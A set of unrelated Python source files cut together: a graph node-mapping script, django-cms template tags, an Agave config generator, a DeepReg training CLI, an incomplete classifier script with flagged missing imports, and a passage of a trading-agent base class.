    g1_nbrs2_edge_len = g1.subgraph(g1_nbrs2_only).number_of_edges()
    g1_nbrs3 = utils.knbrs(g1, m, 3)
    g1_nbrs3_len = len(g1_nbrs3)
    g1_nbrs3_only = set(g1_nbrs3) - set(g1_nbrs2)
    g1_nbrs3_edge_len = g1.subgraph(g1_nbrs3_only).number_of_edges()
    sim = {}
    for i2, (n, d2) in enumerate(deg2, 1):
        print(f'\tg1 {i1}/{N} to g2 {n}[{i2}/{deg2_len}]')
        # Ring 1: compare direct-neighbourhood edge densities and degree ratios.
        g2_nbrs1 = utils.knbrs(g2, n, 1)
        g2_nbrs1_len = len(g2_nbrs1)
        g2_nbrs1_edge_len = g2.subgraph(g2_nbrs1).number_of_edges()
        # NOTE(review): denominators below can be zero for isolated/sparse
        # nodes — a ZeroDivisionError would propagate; confirm inputs exclude that.
        r1_A = (g1_nbrs1_edge_len * g2_nbrs1_edge_len) / (g1_nbrs1_len * g2_nbrs1_len)
        r1_B = abs(d1 / g1_nbrs1_edge_len - d2 / g2_nbrs1_edge_len)
        r1 = r1_A * r1_B
        # Ring 2: same comparison on the 2-hop-only shell.
        g2_nbrs2 = utils.knbrs(g2, n, 2)
        g2_nbrs2_len = len(g2_nbrs2)
        g2_nbrs2_only = set(g2_nbrs2) - set(g2_nbrs1)
        g2_nbrs2_edge_len = g2.subgraph(g2_nbrs2_only).number_of_edges()
        r2_A = (g1_nbrs2_edge_len * g2_nbrs2_edge_len) / (len(g1_nbrs2_only) * len(g2_nbrs2_only))
        r2_B = abs(len(g1_nbrs2_only) / g1_nbrs2_len - len(g2_nbrs2_only) / g2_nbrs2_len)
        r2 = r2_A * r2_B
        # Ring 3: same comparison on the 3-hop-only shell.
        g2_nbrs3 = utils.knbrs(g2, n, 3)
        g2_nbrs3_len = len(g2_nbrs3)
        g2_nbrs3_only = set(g2_nbrs3) - set(g2_nbrs2)
        g2_nbrs3_edge_len = g2.subgraph(g2_nbrs3_only).number_of_edges()
        r3_A = (g1_nbrs3_edge_len * g2_nbrs3_edge_len) / (len(g1_nbrs3_only) * len(g2_nbrs3_only))
        r3_B = abs(len(g1_nbrs3_only) / g1_nbrs3_len - len(g2_nbrs3_only) / g2_nbrs3_len)
        r3 = r3_A * r3_B
        # Combine ring dissimilarities into a similarity (smaller r_i -> larger r).
        r = math.exp(3 / math.exp(r1 + r2 + r3)) - 1
        sim[(m, n)] = r
    # Keep only the best-scoring candidate pair.
    top = max(sim, key=sim.get)
    return top, sim[top]
def seed_free_mapping(args):
    """Compute an initial seed mapping between two graphs without prior seeds.

    Reads both edge lists, scores the top-degree nodes of g1 against twice as
    many top-degree candidates of g2 in parallel, and writes the resulting
    node pairs (one "m n" per line) to the configured output file.
    """
    print(f'##### Running with {args["num_workers"]} workers... #####')
    graph_a = nx.read_edgelist(args["g1_edgelist_file"], nodetype=int)
    graph_b = nx.read_edgelist(args["g2_edgelist_file"], nodetype=int)
    limit = min(graph_a.number_of_nodes(), args['seed_init_num'], graph_b.number_of_nodes())
    # Highest-degree nodes: `limit` from g1, twice as many candidates from g2.
    by_degree = lambda kv: kv[1]
    top_a = sorted(dict(graph_a.degree()).items(), key=by_degree, reverse=True)[:limit]
    top_b = sorted(dict(graph_b.degree()).items(), key=by_degree, reverse=True)[:2 * limit]
    tasks = [
        [idx, limit, node, degree, top_b, len(top_b), graph_a, graph_b]
        for idx, (node, degree) in enumerate(top_a, 1)
    ]
    scores = {}
    with mp.Pool(processes=args['num_workers']) as pool:
        for pair, score in pool.starmap_async(compute_init_seed, tasks).get():
            scores[pair] = score
    # Persist the mapped pairs; the score itself is not written.
    lines = [f'{a} {b}\n' for (a, b) in scores]
    with open(args["output_file"], 'w') as out:
        out.writelines(lines)
        out.flush()
if __name__ == "__main__":
    # Fix: use a distinct name for the parser instead of rebinding the
    # imported module alias `ap` (argparse), which shadowed it.
    parser = ap.ArgumentParser()
    parser.add_argument("-nw", "--num_workers", required=True, type=int, help="Number of workers.")
    parser.add_argument("-g1", "--g1_edgelist_file", required=True, type=str, help="Path to g1 edgelist.")
    parser.add_argument("-g2", "--g2_edgelist_file", required=True, type=str, help="Path to g2 edgelist.")
    parser.add_argument("-sin", "--seed_init_num", default=500, type=int, help="Number of seeds mappings to extract.")
    parser.add_argument("-out", "--output_file", default="mapping_result.txt", type=str, help="Path to output file.")
    parser.add_argument("-mpi", "--map_per_itr", default=1000, type=int,
                        help="Number of nodes to map on each global iteration")
    args = vars(parser.parse_args())
    # Phase 1: derive seeds with no prior knowledge; phase 2: expand from them.
    seed_free_mapping(args)
    args['seed_mapping_file'] = args['output_file']
    seed_based_mapping(args)
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import json
from classytags.core import Tag, Options
from cms.utils.encoder import SafeJSONEncoder
from django import template
from django.utils.safestring import mark_safe
from sekizai.helpers import get_varname
from cms.models import StaticPlaceholder
register = template.Library()
@register.filter('json')
def json_filter(value):
    """
    Returns the JSON representation of ``value`` in a safe manner.
    """
    serialized = json.dumps(value, cls=SafeJSONEncoder)
    return mark_safe(serialized)
@register.filter
def bool(value):
    # Render a Python truth value as the JavaScript literal 'true'/'false'.
    # The function name is the registered filter name, so it must stay `bool`
    # even though it shadows the builtin inside this module.
    return 'true' if value else 'false'
@register.simple_tag(takes_context=True)
def render_cms_structure_js(context, renderer, obj):
    """Render the structure-mode JS for every placeholder declared by *obj*,
    covering both regular page placeholders and static placeholders
    (created on demand, optionally bound to the current site)."""
    markup_bits = []
    static_placeholders = []
    page_placeholders_by_slot = obj.rescan_placeholders()
    declared_static_placeholders = obj.get_declared_static_placeholders(context)
    for static_placeholder in declared_static_placeholders:
        kwargs = {
            'code': static_placeholder.slot,
            'defaults': {'creation_method': StaticPlaceholder.CREATION_BY_TEMPLATE}
        }
        # Site-bound placeholders are scoped to the current site; others are global.
        if static_placeholder.site_bound:
            kwargs['site'] = renderer.current_site
        else:
            kwargs['site_id__isnull'] = True
        # Fetch or lazily create the backing StaticPlaceholder row.
        static_placeholder = StaticPlaceholder.objects.get_or_create(**kwargs)[0]
        static_placeholders.append(static_placeholder)
    # Page placeholders first, in declared order, skipping slots with no content.
    for placeholder_node in obj.get_declared_placeholders():
        page_placeholder = page_placeholders_by_slot.get(placeholder_node.slot)
        if page_placeholder:
            placeholder_js = renderer.render_page_placeholder(obj, page_placeholder)
            markup_bits.append(placeholder_js)
    for placeholder in static_placeholders:
        placeholder_js = renderer.render_static_placeholder(placeholder)
        markup_bits.append(placeholder_js)
    return mark_safe('\n'.join(markup_bits))
@register.simple_tag(takes_context=True)
def render_plugin_init_js(context, plugin):
    """Queue the toolbar-initialisation JS for *plugin*; renders no output itself."""
    renderer = context['cms_renderer']
    plugin_js = renderer.get_plugin_toolbar_js(plugin)
    # Add the toolbar javascript for this plugin to the
    # sekizai "js" namespace.
    context[get_varname()]['js'].append('<script data-cms>{}</script>'.format(plugin_js))
class JavascriptString(Tag):
    """``{% javascript_string %}...{% end_javascript_string %}``: renders the
    enclosed template nodes and emits them as a quoted, JS-escaped string
    literal suitable for embedding in inline JavaScript."""
    name = 'javascript_string'
    options = Options(
        blocks=[
            ('end_javascript_string', 'nodelist'),
        ]
    )
    def render_tag(self, context, **kwargs):
        # escapejs moved between Django versions; fall back for old releases.
        try:
            from django.utils.html import escapejs
        except ImportError:
            from django.utils.text import javascript_quote as escapejs
        rendered = self.nodelist.render(context)
        return "'%s'" % escapejs(rendered.strip())
register.tag(JavascriptString)
|
#!/usr/bin/env python
import os
import argparse
import json
from pprint import pprint
# CLI: substitute TACC account details and an SSH keypair into an Agave
# "system" JSON template, then write the result into tmp_dir.
parser = argparse.ArgumentParser()
parser.add_argument("tacc_username")
parser.add_argument("tacc_project")
parser.add_argument("storage_path")
parser.add_argument("private_key")
parser.add_argument("template_file")
parser.add_argument("tmp_dir")
args = parser.parse_args()
# Fill the template placeholders with the CLI-supplied TACC details.
with open(args.template_file) as f:
    s = f.read()
s = s.replace('${USERNAME}', args.tacc_username)
s = s.replace('${PROJECT}', args.tacc_project)
s = s.replace('${WORKD}', args.storage_path)
jsonDoc = json.loads(s)
# Load the SSH keypair; the public key is expected next to the private one
# with a `.pub` suffix.
with open(args.private_key) as priv:
    privkey = priv.read()
pubkey_file = args.private_key + '.pub'
with open(pubkey_file) as publ:
    pubkey = publ.read()
# Inject the keypair into whichever auth stanzas the template defines.
stanzas = ['login', 'storage']
for stanza in stanzas:
    if stanza in jsonDoc:
        jsonDoc[stanza]['auth']['privateKey'] = privkey
        jsonDoc[stanza]['auth']['publicKey'] = pubkey
# Fix: `errno` was referenced in the race guard below but never imported,
# which turned that path into a NameError.
import errno

# Write out to <tmp_dir>/<template basename>.json
outfilename = args.tmp_dir + '/' + os.path.splitext( os.path.basename(args.template_file) )[0] + '.json'
if not os.path.exists(os.path.dirname(outfilename)):
    try:
        os.makedirs(os.path.dirname(outfilename))
    except OSError as exc: # Guard against race condition
        if exc.errno != errno.EEXIST:
            raise
with open(outfilename, 'w') as outfile:
    json.dump(jsonDoc, outfile, indent=4)
|
"""
Module to train a network using init files and a CLI
"""
import argparse
import logging
import os
from datetime import datetime
import tensorflow as tf
import deepreg.config.parser as config_parser
import deepreg.model.optimizer as opt
from deepreg.dataset.load import get_data_loader
from deepreg.model.network.build import build_model
def init(config_path, log_dir, ckpt_path):
    """
    Prepare a training run: create the log directory, validate the
    checkpoint path, and load + back up the configuration.

    :param config_path: list of str, path to config file
    :param log_dir: str, path to where training logs are stored
    :param ckpt_path: str, path where model is stored
    :return: (parsed config, resolved log directory path)
    """
    # Default to a timestamped directory under logs/ when none was given.
    if log_dir == "":
        log_dir = os.path.join("logs", datetime.now().strftime("%Y%m%d-%H%M%S"))
    else:
        log_dir = os.path.join("logs", log_dir)
    if os.path.exists(log_dir):
        logging.warning("Log directory {} exists already.".format(log_dir))
    else:
        os.makedirs(log_dir)
    # Only TensorFlow checkpoint files are supported.
    if ckpt_path != "" and not ckpt_path.endswith(".ckpt"):
        raise ValueError("checkpoint path should end with .ckpt")
    # Load the configuration and keep a copy next to the logs.
    config = config_parser.load_configs(config_path)
    config_parser.save(config=config, out_dir=log_dir)
    return config, log_dir
def train(
    gpu: str, config_path: list, gpu_allow_growth: bool, ckpt_path: str, log_dir: str
):
    """
    Function to train a model
    :param gpu: str, which local gpu to use to train
    :param config_path: str, path to configuration set up
    :param gpu_allow_growth: bool, whether or not to allocate
        whole GPU memory to training
    :param ckpt_path: str, where to store training ckpts
    :param log_dir: str, where to store logs in training
    """
    # env vars
    os.environ["CUDA_VISIBLE_DEVICES"] = gpu
    os.environ["TF_FORCE_GPU_ALLOW_GROWTH"] = "true" if gpu_allow_growth else "false"
    # load config
    config, log_dir = init(config_path, log_dir, ckpt_path)
    dataset_config = config["dataset"]
    preprocess_config = config["train"]["preprocess"]
    optimizer_config = config["train"]["optimizer"]
    model_config = config["train"]["model"]
    loss_config = config["train"]["loss"]
    num_epochs = config["train"]["epochs"]
    save_period = config["train"]["save_period"]
    # histogram logging follows the checkpoint cadence
    histogram_freq = save_period
    # data
    data_loader_train = get_data_loader(dataset_config, "train")
    if data_loader_train is None:
        raise ValueError(
            "Training data loader is None. Probably the data dir path is not defined."
        )
    # validation is optional; everything below guards on data_loader_val
    data_loader_val = get_data_loader(dataset_config, "valid")
    dataset_train = data_loader_train.get_dataset_and_preprocess(
        training=True, repeat=True, **preprocess_config
    )
    dataset_val = (
        data_loader_val.get_dataset_and_preprocess(
            training=False, repeat=True, **preprocess_config
        )
        if data_loader_val is not None
        else None
    )
    dataset_size_train = data_loader_train.num_samples
    dataset_size_val = (
        data_loader_val.num_samples if data_loader_val is not None else None
    )
    # at least one step per epoch even when the dataset is smaller than a batch
    steps_per_epoch_train = max(
        dataset_size_train // preprocess_config["batch_size"], 1
    )
    steps_per_epoch_valid = (
        max(dataset_size_val // preprocess_config["batch_size"], 1)
        if data_loader_val is not None
        else None
    )
    # distribute model build/compile across all visible GPUs
    strategy = tf.distribute.MirroredStrategy()
    with strategy.scope():
        # model
        model = build_model(
            moving_image_size=data_loader_train.moving_image_shape,
            fixed_image_size=data_loader_train.fixed_image_shape,
            index_size=data_loader_train.num_indices,
            labeled=dataset_config["labeled"],
            batch_size=preprocess_config["batch_size"],
            model_config=model_config,
            loss_config=loss_config,
        )
        # compile
        optimizer = opt.get_optimizer(optimizer_config)
        model.compile(optimizer=optimizer)
        # load weights
        if ckpt_path != "":
            model.load_weights(ckpt_path)
        # train
        # callbacks
        tensorboard_callback = tf.keras.callbacks.TensorBoard(
            log_dir=log_dir, histogram_freq=histogram_freq
        )
        checkpoint_callback = tf.keras.callbacks.ModelCheckpoint(
            filepath=log_dir + "/save/weights-epoch{epoch:d}.ckpt",
            save_weights_only=True,
            period=save_period,
        )
        # it's necessary to define the steps_per_epoch and validation_steps to prevent errors like
        # BaseCollectiveExecutor::StartAbort Out of range: End of sequence
        model.fit(
            x=dataset_train,
            steps_per_epoch=steps_per_epoch_train,
            epochs=num_epochs,
            validation_data=dataset_val,
            validation_steps=steps_per_epoch_valid,
            callbacks=[tensorboard_callback, checkpoint_callback],
        )
    # release file handles held by the loaders
    data_loader_train.close()
    if data_loader_val is not None:
        data_loader_val.close()
def main(args=None):
    """Entry point for train script.

    Parses CLI arguments and launches :func:`train`.

    :param args: optional list of CLI tokens (defaults to sys.argv).
    """
    parser = argparse.ArgumentParser(
        description="train", formatter_class=argparse.ArgumentDefaultsHelpFormatter
    )
    ## ADD POSITIONAL ARGUMENTS
    parser.add_argument(
        "--gpu",
        "-g",
        help="GPU index for training."
        '-g "" for using CPU'
        '-g "0" for using GPU 0'
        '-g "0,1" for using GPU 0 and 1.',
        type=str,
        required=True,
    )
    parser.add_argument(
        "--gpu_allow_growth",
        "-gr",
        help="Prevent TensorFlow from reserving all available GPU memory",
        default=False,
        # Fix: declared as a boolean flag. Previously the option consumed a
        # value and any non-empty string (including "False") was truthy.
        action="store_true",
    )
    parser.add_argument(
        "--ckpt_path",
        "-k",
        help="Path of the saved model checkpoint to load."
        "No need to provide if start training from scratch.",
        default="",
        type=str,
        required=False,
    )
    parser.add_argument(
        "--log_dir",
        "-l",
        help="Name of log directory. The directory is under logs/."
        "If not provided, a timestamp based folder will be created.",
        default="",
        type=str,
    )
    parser.add_argument(
        "--config_path",
        "-c",
        help="Path of config, must end with .yaml. Can pass multiple paths.",
        type=str,
        nargs="+",
        required=True,
    )
    args = parser.parse_args(args)
    train(
        args.gpu, args.config_path, args.gpu_allow_growth, args.ckpt_path, args.log_dir
    )
|
from __future__ import print_function
import os
import sys
import argparse
import _pickle as pickle
import ngrams_features_creator
from sklearn.model_selection import train_test_split
from sklearn.ensemble import RandomForestClassifier
from sklearn.metrics import precision_score, recall_score, roc_curve, auc
#from sklearn.cluster import KMeans
# %% train test data splits
# NOTE(review): X_features and y_labels are not defined in this module —
# presumably produced by ngrams_features_creator; confirm against that module.
X_train, X_test, y_train, y_test = train_test_split(X_features, y_labels, test_size = 0.15, shuffle = False)
print('The first 2 training sample :', (X_train[0:1]))
# %% Construct learning pipelines for classification model
# NOTE(review): Pipeline, MinMaxScaler, MultinomialNB and ComplementNB are
# used below but never imported here — missing sklearn imports?
# standard MNB
pipe_mnb = Pipeline([('p1',MinMaxScaler()),('MNB', MultinomialNB())])
# NB for imbalance data
pipe_cnb = Pipeline([('p2',MinMaxScaler()), ('CNB', ComplementNB())])
# create a list of pipeline and fit training data on it
classifier_pipe = [pipe_mnb, pipe_cnb]#, pipe_knn, pipe_nc]
# create dictionary of pipeline classifiers (index -> display name)
pipe_dic = {0: 'pipe_mnb', 1: 'pipe_cnb'}#,
            #2:'knn', 3: 'kc'}
# fit training data on the classifier pipe
for pipe in classifier_pipe:
    pipe.fit(X_train, y_train)
# validate models on training set
perf_train = []
for indx, val in enumerate(classifier_pipe):
    perf_trg = pipe_dic[indx], val.score(X_train,y_train)
    perf_train.append(perf_trg)
# validate models on test set
perf_test = []
for indx, val in enumerate(classifier_pipe):
    perf_tst1 = pipe_dic[indx], val.score(X_test,y_test)
    perf_test.append(perf_tst1)
# %% Performance visualisations on tabular dataframe
# convert train and test details to data frame
# NOTE(review): pd (pandas) is also used without an import in this module.
pd_ptrain = pd.DataFrame(perf_train)
pd_ptest = pd.DataFrame(perf_test)
# concatenate dataframes
perf_log1 = pd.concat(
    [pd_ptrain.rename(columns={ 0: 'Classifiers', 1: 'train_performance'}),
     pd_ptest.rename(columns={ 0: 'Classifiers1', 1: 'test_performance'}),], axis = 1
)
# create a simplified log out for models performances
perf_log = perf_log1.drop(['Classifiers1'], axis =1)
print('models performances on train and test datasets:', (perf_log))
# select and save the best classifier model
# NOTE(review): the max() result below is discarded — nothing is selected or
# saved here; presumably the best model should be persisted. Confirm intent.
max(perf_log.test_performance)
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
'''
Implement an agent interface to interact with Neutrino API and simulate the
environment to allow testing the strategies created
@author: ucaiado
Created on 05/07/2018
'''
from __future__ import print_function
import json
import logging
import signal
import sys
import os
import yaml
from neutrinogym.qcore import (PATH, PROD, VERB)
# simulation imports
if not PROD:
from neutrinogym import neutrino
from neutrinogym.neutrino import (fx, Source, NotificationEvent)
from .utils.neutrino_utils import DoubleWrapperError
# production imports
else:
import neutrino
from neutrino import (fx, Source, NotificationEvent)
from base import logger
# agent imports
from .utils.handle_orders import (OrderHandler, Instrument)
from .utils.CandleHistory import CandleHistory
from .utils.handle_data import (CandlesHandler, fill_orderinfo, BookHandler)
from .utils.neutrino_utils import (SubscrType, CandleIntervals, get_begin_time)
from .utils.neutrino_utils import (SymbolSubscriptionError, neutrino_now)
import pdb
'''
Begin help functions
'''
def include_to_this_order(order_info, d_info):
    '''
    Attach a new userData payload to the current order held by an OrderInfo
    :param order_info: OrderInfo. Wrapper holding the neutrino order
    :param d_info: dict. Information to persist on the order
    '''
    current_order = order_info.neutrino_order.current
    current_order.userData = d_info
def signal_handler(i_signal, frame):
    '''
    Terminate neutrino when receiving Ctrl+C (SIGINT) from anywhere.
    Signals other than SIGINT (2) are ignored.
    '''
    if i_signal != 2:
        return
    print('signal_handler(): You pressed Ctrl+C!')
    fx.quit()
    sys.exit(0)
# Install the Ctrl+C handler so any SIGINT shuts neutrino down cleanly.
signal.signal(signal.SIGINT, signal_handler)
'''
End help functions
'''
# Module-level singletons shared by every Agent instance in this process.
orders = OrderHandler()
books = BookHandler()
candles = CandlesHandler()
class Agent(object):
    '''
    A generic implementation of an agent that interacts with the Neutrino
    class. The main API methods that users of this class need to know are:
        on_initialize
        on_book_update
        on_order_fill
        on_order_update
        on_candle_update
    And set the following attributes:
        command_space: The Command object corresponding to valid commands
    The methods are accessed publicly as "on_initialize", "on_order_fill", etc.
    '''
    # Set these in SOME subclasses
    _baseagent = 'Agent'
    i_id = 11 # simulation attribute
    action_obj = None # simulation attribute
    _instr_from_conf = [] # simulation attribute
    brain = None # RL variable
    # Set this in ALL subclasses
    command_space = None
    # Override these subclasses
    def on_initialize(self): raise NotImplementedError
    def on_book_update(self, instrument): pass
    def on_order_fill(self, order_info, f_lastpx, i_lastqty): pass
    def on_order_update(self, order_info, s_rejected=''): pass
    def on_candle_update(self, candle_data): pass
    def on_idle(self): pass
    # Do not override
    def display(self, book): pass
    def processQuit(self):
        '''
        Process Quit command from AlgoManager: cancel everything and flag the
        agent to quit once no orders are pending.
        '''
        self._should_quit = True
        self.set_offline()
        self.print_debug_msg(self._mlogs['pquit'], True)
    def initialize(self, symbols=None):
        '''
        Reset the module singletons and all internal state of the agent,
        then delegate to the subclass on_initialize().
        :param symbols: list. Optional instrument list (not used directly here)
        '''
        # production stuff
        if PROD:
            logger.set_logger(os.getcwd())
            d_config = json.loads(open(fx.getConfigFile(), 'r').read())
            self._instr_from_conf = [x['Symbol'] for x in d_config['Symbols']]
        # initialize an Orders and Books objects
        orders.set_owner(self)
        books.set_owner(self)
        candles.reset()
        # initialize attributes
        self._instr = []
        self._instr_stack = {}
        self._disable_bid = True
        self._disable_ask = True
        self._done = True # the agent start disabled
        self._should_quit = False
        self.f_time_to_debug = 0
        self._last_setoffline = 0
        self._last_emptysettings = 10e9
        self._no_msg_printed_yet = True
        self._mlogs = yaml.safe_load(open(PATH + '/conf/conf_logs.yaml', 'r'))
        self._mlogs = self._mlogs['Agent']
        self._msg_offline = self._mlogs['offline1']
        # control candles updates (throttling, see indicatorData)
        self._last_candle_update = {}
        self.dcandle = 0.1
        # initialize specific attributes of the agent
        self.on_initialize()
    def symbolsLoaded(self):
        '''
        Indicate that the instrument was loaded and is ready to use
        '''
        # check the instruments and candles subscribed in on_initialize
        f_fxnow = neutrino_now(b_ts=True) # simulation
        s_msg = candles.on_symbols_load(f_fxnow=f_fxnow)
        self.update_emptysettingctrl(b_new=True) # check pings
        if s_msg:
            s_msg = self._mlogs['symbol'] % s_msg
            self.print_debug_msg(s_msg, True)
        for instrument in iter(self._instr_stack.values()):
            # instantiate initial list of orders
            instrument.on_symbols_load(self)
    def bidSide(self, source, book=None):
        '''
        Update the bid orders from the agent, given an event (source) that can
        be mkt, commd, order or idle
        :param source: string. The source of the update
        :param *book: Neutrino Book object. The book updated
        '''
        # NOTE(review): unconditional debug print on every bid-side event;
        # looks like leftover debugging — confirm before removing.
        print(source)
        if source == Source.IDLE:
            self.on_idle()
            self.update_emptysettingctrl() # check pings
            return
        if not book or book.name() not in self._instr_stack:
            return
        if (book and fx.isOnline(book.name())) or (source == Source.IDLE):
            instrument = self._instr_stack.get(book.name())
            self.on_book_update(instrument)
            self.update_emptysettingctrl() # check pings
            candles.check_pending_candles_subscriptions(int(neutrino_now()))
    def askSide(self, source, book=None):
        '''
        Update the ask orders from the agent, given an event (source) that can
        be mkt, commd, order or idle
        :param source: Neutrino Source object.
        :param *book: Neutrino Book object. The book updated
        '''
        if not book or book.name() not in self._instr_stack:
            return
        if book and fx.isOnline(book.name()):
            instrument = self._instr_stack.get(book.name())
            self.on_book_update(instrument)
    def orderFilled(self, order, lastpx, lastqty):
        '''
        Indicate that a trade has happened. Give the agent the opportunity to
        close its position before update the data related to the order
        :param order: neutrino Order object. the order filled
        :param lastpx: float. last execution price
        :param lastqty: integer. last qty filled of the Order
        '''
        # update positions controls
        s_symbol = order.symbol
        instr = self._instr_stack[s_symbol]
        orders.send_cancel_acc(order, 'E')
        instr.update_position(order, lastpx, lastqty)
        instr.update_active_qty(order, 'E', lastqty)
        # log order
        s_time = (neutrino_now(True))[:-3] # simulation
        s_msg = self._mlogs['fill']
        s_msg = s_msg.format(
            s_time,
            lastqty,
            order.userData['id'],
            s_symbol,
            lastpx,
            order.side
        )
        self.print_debug_msg(s_msg, True, True)
        # call agent's specific handling
        order_data = fill_orderinfo(order)
        self.on_order_fill(order_data, lastpx, lastqty)
    def orderUpdated(self, order, rejected=''):
        '''
        Indicate that an order was updated
        :param order: neutrino Order object. the order updated
        :param rejected: string. If the order was rejected
        '''
        s_msg = self._mlogs['order'].format(
            order.side,
            order.symbol,
            order.userData['id']
        )
        # if not isinstance(rejected, (str, unicode)):
        #     rejected = ''
        if order.current:
            s_msg += self._mlogs['ord1'].format(
                order.current.secondaryOrderID,
                order.current.status
            )
            instr = self._instr_stack[order.symbol]
            instr.update_order_ctrls(order)
            if str(order.current.status) in ['CANCELLED', 'REJECTED']:
                i_cumqty = order.current.cumQty
                # guard against garbage cumQty values coming from the feed
                i_cumqty = i_cumqty if abs(i_cumqty) < 10**7 else 0
                i_qty = order.current.qty - i_cumqty
                instr.update_active_qty(order, 'RC', i_qty)
            order_data = fill_orderinfo(order)
            self.on_order_update(order_data, rejected)
            if not order.isAlive():
                # NOTE(review): no-op branch — placeholder for dead-order
                # handling? confirm intent.
                pass
        self.update_emptysettingctrl(b_newordr=True) # check pings
        if rejected:
            s_msg += self._mlogs['ord2'].format(rejected)
        self.print_debug_msg(s_msg, True, True) # production
    def indicatorData(self, raw_data):
        '''
        Update the Dataobject using the information inside raw_data
        :param raw_data: Flatbuffer object.
        '''
        hist = CandleHistory.GetRootAsCandleHistory(raw_data, 0)
        s_aux = str(hist.Indicator())
        f_time = neutrino_now()
        # throttle: drop updates arriving faster than self.dcandle per indicator
        if (f_time - self._last_candle_update.get(s_aux, 0)) < self.dcandle:
            return
        self._last_candle_update[s_aux] = f_time
        s_instrument = s_aux.split(':')[1]
        b_is_all_updated = candles.update(hist)
        if b_is_all_updated:
            i_interval = hist.Interval()
            this_candle = candles.get_candle(None, s_instrument, i_interval)
            self.on_candle_update(this_candle)
    def setOffline(self):
        '''
        Set agent to offline (stop sending new orders) and cancel all its alive
        orders
        '''
        f_time = neutrino_now()
        # debounce: ignore repeated setOffline calls within 2 seconds
        if f_time - self._last_setoffline > 2.:
            self._last_setoffline = f_time
            self.set_offline()
    def prtbrdcast(self, s_msg):
        '''
        Print the message passed to a log file and broadcast it (print the
        message in telnet screen, for example, or return it as a response to a
        socket requisition)
        :param s_msg: string. Message to be printed
        '''
        # production (no option, just comment the line below)
        # fx.broadcast(s_msg) # simulation (not available just to quantick)
        self.print_debug_msg(s_msg, True)
    def command(self, source, s_command):
        '''
        Process the command received by socket. '_command' should return if it
        was able to execute the command passed
        :param source: neutrino Socket object.
        :param s_command: string. the string sent by the command line
        :return: Return True if the string command is used, False otherwise
        '''
        self.command_space.on_command(s_command)
    def processSetParameters(self, s_param):
        '''
        Process parameters passed. The auxiliary on_set_parameters method
        should return a list of commands to be passed to command() method
        :param s_param: string. JSON encoded as a string. the primary key is
            the agent's name, that is used to check if the right agent is
            receiving the parameters. e.g.:
            {'agentname': {'param1': values, 'param2': values}}
        :return:
        '''
        try:
            d_parameters = json.loads(s_param)
            l_commands = self.command_space.on_set_parameters(d_parameters)
            for d_command in l_commands:
                self.command_space.on_command(d_command)
        except:
            # quit neutrino before re-raising so the process does not hang
            fx.quit()
            raise
    def processGetParameters(self):
        '''
        Process getParameters. The auxiliary on_get_parameters method should
        return a dictionary
        :return: string. JSON-encoded configuration dictionary
        '''
        self.update_emptysettingctrl(b_new=True) # check pings
        try:
            d_config = self.command_space.on_get_parameters()
            return json.dumps(d_config)
        except:
            # quit neutrino before re-raising so the process does not hang
            fx.quit()
            raise
    def lostMarketFeed(self):
        '''
        Inform the strategy that the neutrino lost connection to the market
        data server. It is called only by Quantick in the production
        environment.
        '''
        self._should_quit = True
        self.set_offline()
        self.print_debug_msg(self._mlogs['mktfeed'], True)
        fx.quit()
    # Simulation methods
    def setup_simulation(self, i_agentid=11, l_instr_from_conf=None,
                         brain=None):
        '''
        Subscribe instrument list, agent id and maximum stack of orders.
        Agent ID is used just by the gym. Not required in production
        environment
        :param l_instr_from_conf: list. Instruments on config file
        :param *i_agentid: integer. Id of the agent
        :param *brain: RL brain object used by learning agents
        '''
        self.i_id = i_agentid
        self._instr_from_conf = l_instr_from_conf
        # set RL agents parameters
        self.brain = brain
    # Other methods
    def subscribe(self, s_symbol, subcr_type=SubscrType.BOOK, **kwargs):
        '''
        Subscribe the instrument or candle desired
        :param s_symbol: string. the instrument to subscribe
        :param subcr_type: enum. what should be subscribed
        :param *ords_stack_size: integer. to book. size of order stack
        :param *i_interval: integer. to candles. The candle interval
        :param *i_nbars: integer. to candles. bars to retrieve
        :param *s_alias: string. to candles. name alias to this candle
        '''
        if subcr_type == SubscrType.BOOK:
            if s_symbol not in self._instr_from_conf:
                raise SymbolSubscriptionError(self._mlogs['errsbc'] % s_symbol)
            # NOTE(review): re-subscribing an already-known book falls through
            # and returns None — confirm callers handle that.
            if s_symbol not in self._instr:
                ords_stack_size = kwargs.get('ords_stack_size', 100)
                self._instr.append(s_symbol)
                this_instrument = Instrument(s_symbol, ords_stack_size)
                self._instr_stack[s_symbol] = this_instrument
                return this_instrument
        elif subcr_type == SubscrType.CANDLES:
            i_intv = kwargs.get('interval', CandleIntervals.MIN_1)
            i_intv = i_intv.value
            i_nbars = kwargs.get('i_nbars', 5)
            s_aux = kwargs.get('s_alias', None)
            this_candle = candles.subscribe(s_symbol, i_intv, i_nbars, s_aux)
            return this_candle
        else:
            raise NotImplementedError(self._mlogs['errsbc2'] % subcr_type)
    def print_debug_msg(self, s_msg, b_printanyway=False, b_notify_user=False):
        '''
        Control the amount of debug that is used
        :param s_msg: string. Message to print
        :param b_printanyway: boolean. If should bypass the time constraint
        :param b_notify_user: boolean. If should also pop up a notification
        '''
        f_time = neutrino_now()
        # rate-limit debug output to one message every 5 seconds unless forced
        if b_printanyway or f_time > self.f_time_to_debug + 5:
            self.f_time_to_debug = f_time
            logging.debug(s_msg)
            if b_notify_user and VERB:
                fx.notify(NotificationEvent.POPUP, s_msg)
    def any_pending_orders(self):
        '''
        Return if there are any order active or pending
        '''
        for instrument in iter(self._instr_stack.values()):
            if instrument._orders:
                return True
        return False
    def is_offline(self):
        '''
        Return if the strategy is offline; while offline, keep cancelling any
        remaining orders and quit neutrino once nothing is pending
        '''
        if self._done:
            if self._no_msg_printed_yet:
                self.print_debug_msg(self._msg_offline, True, True)
                self._no_msg_printed_yet = False
            else:
                self.print_debug_msg(self._msg_offline)
            orders.cancel_all_orders()
            if self._should_quit and not self.any_pending_orders():
                fx.quit()
            return self._done
        f_time = neutrino_now()
        if self._should_quit and f_time - self._last_setoffline > 4.:
            fx.quit()
        return self._done
    def update_emptysettingctrl(self, b_new=False, b_newordr=False):
        '''
        Update Quantick pings control. Set the strategy offline and quit it if
        no communication is detected after 11min. The "ping" from Quantick
        consists in an empty ProcessSetParameters. If the response from the
        agent takes more than 1 minute, the Quantick marks it as failed. It
        repeats this process every 3 min. If 3 pings failed in a row, the
        Quantick considers that the strategy is not alive, so it should be
        killed (if it is still is).
        :param b_new: boolean. New ping indicator flag
        :param b_newordr: New order flag. Penalize the strategy every time that
